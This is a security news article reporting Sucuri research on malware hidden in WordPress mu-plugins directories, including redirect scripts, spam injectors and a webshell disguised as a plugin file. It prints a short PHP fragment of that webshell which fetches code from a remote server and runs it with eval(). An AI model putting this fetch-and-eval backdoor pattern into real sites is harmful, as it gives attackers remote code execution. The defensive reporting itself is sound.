Recent discoveries have uncovered a concerning trend where threat actors are strategically concealing malicious code within WordPress websites’ mu-plugins directory.
This directory is particularly valuable for attackers as it loads automatically with WordPress, making detection and removal more challenging.
The malware variants discovered employ sophisticated techniques to maintain persistence while executing harmful functions ranging from user redirection to complete website takeovers.
The attacks target the mu-plugins folder with multiple malware types that appear legitimate but contain malicious code.
These include redirect scripts that send unsuspecting visitors to harmful domains, webshells that provide attackers with remote code execution capabilities, and spam injectors that manipulate website content to distribute unwanted material.
Sucuri researchers detected that these malware variants are carefully designed to avoid detection by excluding search engine crawlers and privileged users from seeing malicious behavior.
Their analysis revealed that the attackers are employing increasingly sophisticated techniques to ensure their malware remains hidden while maximizing its impact on targeted websites.
Websites infected with these malicious scripts suffer from multiple consequences, including reputation damage, potential data theft, malware distribution to visitors, and unauthorized website modifications.
The most damaging variant allows attackers to establish persistent access to the compromised website, creating a foundation for long-term exploitation.
Webshell Analysis: Remote Code Execution Capabilities
The most concerning variant discovered is a webshell disguised as a legitimate WordPress plugin file placed in the wp-content/mu-plugins/index.php location.
.webp)
This webshell contains code designed to download and execute remote PHP scripts:-
if (curl_errno($connectionHandle))
die('cURL error occurred: ' . curl_error($connectionHandle));
}
curl_close($connectionHandle);
eval("?>" . $retrievedCode);
This snippet demonstrates how the malware uses PHP’s eval() function to execute arbitrary code fetched from a remote server.
The approach allows attackers to run commands with the same privileges as the web server, potentially leading to complete website compromise.
Once established, this backdoor grants attackers the ability to upload files, delete content, and access sensitive information, turning the compromised website into a platform for launching further attacks against visitors and connected systems.
Are You from SOC/DFIR Team? - Try Free Malware Research with ANY.RUN - Start Now